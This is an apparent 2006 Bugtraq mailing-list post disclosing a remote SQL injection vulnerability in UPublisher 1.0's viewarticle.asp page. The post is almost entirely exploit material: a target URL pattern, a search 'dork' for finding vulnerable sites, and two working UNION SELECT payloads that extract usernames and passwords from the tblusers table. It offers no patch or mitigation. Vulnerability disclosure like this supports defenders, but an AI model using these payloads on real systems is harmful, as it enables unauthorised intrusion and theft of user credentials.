
Date: 12 Nov 2006 17:24:45 -0000
From: ajannhwt@...mail.com
To: bugtraq@...urityfocus.com
Subject: UPublisher 1.0 (viewarticle.asp) Remote SQL Injection Vulnerability

*******************************************************************************
# Title  :  UPublisher 1.0 (viewarticle.asp) Remote SQL Injection Vulnerability
# Author :   ajann
# Dork   :   UPublisher


*******************************************************************************

###http://[target]/[path]//viewarticle.asp?ID=[SQL]

Example: 

//viewarticle.asp?ID=-1%20union%20select%200,password,username,0,0,0,0%20from%20tblusers
OR ---
//viewarticle.asp?ID=-1%20union%20select%200,0,username,password,0,0,0,0,0%20from%20tblusers

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!
